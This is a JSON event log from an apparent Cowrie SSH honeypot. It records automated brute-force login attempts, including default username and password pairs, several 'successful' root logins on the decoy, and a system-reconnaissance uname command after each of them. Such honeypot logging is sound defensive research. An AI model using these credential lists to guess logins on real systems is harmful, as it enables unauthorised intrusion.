{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:17.873747Z","src_ip":"45.125.211.194","session":"2e2553907544"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:18.709413Z","src_ip":"45.125.211.194","session":"2e2553907544"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:19.921679Z","src_ip":"45.125.211.194","session":"2e2553907544"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":12610,"dst_ip":"1.2.3.4","dst_port":22,"session":"c243ae77d845","protocol":"ssh","message":"New connection: 80.94.95.15:12610 (1.2.3.4:22) [session: c243ae77d845]","sensor":"my-vps","timestamp":"2025-08-28T03:36:20.895144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:36:20.896021Z","src_ip":"80.94.95.15","session":"c243ae77d845"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:36:20.989964Z","src_ip":"80.94.95.15","session":"c243ae77d845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45990,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad8773f3e1c6","protocol":"ssh","message":"New connection: 212.227.125.160:45990 (1.2.3.4:22) [session: ad8773f3e1c6]","sensor":"my-vps","timestamp":"2025-08-28T03:36:21.502163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:21.505764Z","src_ip":"212.227.125.160","session":"ad8773f3e1c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:21.721322Z","src_ip":"212.227.125.160","session":"ad8773f3e1c6"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora","message":"login attempt [aurora/aurora] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:22.048910Z","src_ip":"80.94.95.15","session":"c243ae77d845"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:22.595697Z","src_ip":"212.227.125.160","session":"ad8773f3e1c6"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora1","message":"login attempt [aurora/aurora1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:23.137743Z","src_ip":"80.94.95.15","session":"c243ae77d845"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:23.816756Z","src_ip":"212.227.125.160","session":"ad8773f3e1c6"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora123","message":"login attempt [aurora/aurora123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:24.205570Z","src_ip":"80.94.95.15","session":"c243ae77d845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46130,"dst_ip":"1.2.3.4","dst_port":22,"session":"c473633384ad","protocol":"ssh","message":"New connection: 212.227.235.229:46130 (1.2.3.4:22) [session: c473633384ad]","sensor":"my-vps","timestamp":"2025-08-28T03:36:24.269575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:36:24.286214Z","src_ip":"212.227.235.229","session":"c473633384ad"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:36:24.398158Z","src_ip":"212.227.235.229","session":"c473633384ad"}
{"eventid":"cowrie.login.failed","username":"user","password":"Pass1234","message":"login attempt [user/Pass1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:25.556456Z","src_ip":"212.227.235.229","session":"c473633384ad"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora1234","message":"login attempt [aurora/aurora1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:25.618017Z","src_ip":"80.94.95.15","session":"c243ae77d845"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:26.662200Z","src_ip":"212.227.235.229","session":"c473633384ad"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora12345","message":"login attempt [aurora/aurora12345] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:26.699181Z","src_ip":"80.94.95.15","session":"c243ae77d845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56428,"dst_ip":"1.2.3.4","dst_port":22,"session":"43a9f591cce7","protocol":"ssh","message":"New connection: 212.227.125.160:56428 (1.2.3.4:22) [session: 43a9f591cce7]","sensor":"my-vps","timestamp":"2025-08-28T03:36:27.211435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:27.212190Z","src_ip":"212.227.125.160","session":"43a9f591cce7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:27.423629Z","src_ip":"212.227.125.160","session":"43a9f591cce7"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:36:28.313112Z","src_ip":"212.227.125.160","session":"43a9f591cce7"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:28.436831Z","src_ip":"80.94.95.15","session":"c243ae77d845"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:36:28.815546Z","src_ip":"212.227.125.160","session":"43a9f591cce7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:36:28.816298Z","src_ip":"212.227.125.160","session":"43a9f591cce7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:29.029659Z","src_ip":"212.227.125.160","session":"43a9f591cce7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:29.030716Z","src_ip":"212.227.125.160","session":"43a9f591cce7"}
{"eventid":"cowrie.session.closed","duration":"15.7","message":"Connection lost after 15.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:30.115021Z","src_ip":"167.94.138.60","session":"e8afb814f231"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":61234,"dst_ip":"1.2.3.4","dst_port":22,"session":"09c490c52b5b","protocol":"ssh","message":"New connection: 45.125.211.194:61234 (1.2.3.4:22) [session: 09c490c52b5b]","sensor":"my-vps","timestamp":"2025-08-28T03:36:32.474321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:32.486350Z","src_ip":"45.125.211.194","session":"09c490c52b5b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:32.684928Z","src_ip":"45.125.211.194","session":"09c490c52b5b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:33.517698Z","src_ip":"45.125.211.194","session":"09c490c52b5b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:34.728474Z","src_ip":"45.125.211.194","session":"09c490c52b5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59958,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6393149c3e7","protocol":"ssh","message":"New connection: 212.227.235.229:59958 (1.2.3.4:22) [session: d6393149c3e7]","sensor":"my-vps","timestamp":"2025-08-28T03:36:42.017125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:42.017956Z","src_ip":"212.227.235.229","session":"d6393149c3e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:42.266788Z","src_ip":"212.227.235.229","session":"d6393149c3e7"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:36:43.016092Z","src_ip":"212.227.235.229","session":"d6393149c3e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:36:43.538258Z","src_ip":"212.227.235.229","session":"d6393149c3e7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:36:43.539043Z","src_ip":"212.227.235.229","session":"d6393149c3e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:43.810750Z","src_ip":"212.227.235.229","session":"d6393149c3e7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:43.811809Z","src_ip":"212.227.235.229","session":"d6393149c3e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59512,"dst_ip":"1.2.3.4","dst_port":22,"session":"c861a8dcb04d","protocol":"ssh","message":"New connection: 212.227.125.160:59512 (1.2.3.4:22) [session: c861a8dcb04d]","sensor":"my-vps","timestamp":"2025-08-28T03:36:45.282439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:45.283173Z","src_ip":"212.227.125.160","session":"c861a8dcb04d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:45.499455Z","src_ip":"212.227.125.160","session":"c861a8dcb04d"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:36:46.150072Z","src_ip":"212.227.125.160","session":"c861a8dcb04d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:36:46.669574Z","src_ip":"212.227.125.160","session":"c861a8dcb04d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:36:46.670246Z","src_ip":"212.227.125.160","session":"c861a8dcb04d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:46.888675Z","src_ip":"212.227.125.160","session":"c861a8dcb04d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:46.889726Z","src_ip":"212.227.125.160","session":"c861a8dcb04d"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":54123,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c12f00209fd","protocol":"ssh","message":"New connection: 45.125.211.194:54123 (1.2.3.4:22) [session: 3c12f00209fd]","sensor":"my-vps","timestamp":"2025-08-28T03:36:47.387886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:47.405071Z","src_ip":"45.125.211.194","session":"3c12f00209fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:47.601430Z","src_ip":"45.125.211.194","session":"3c12f00209fd"}
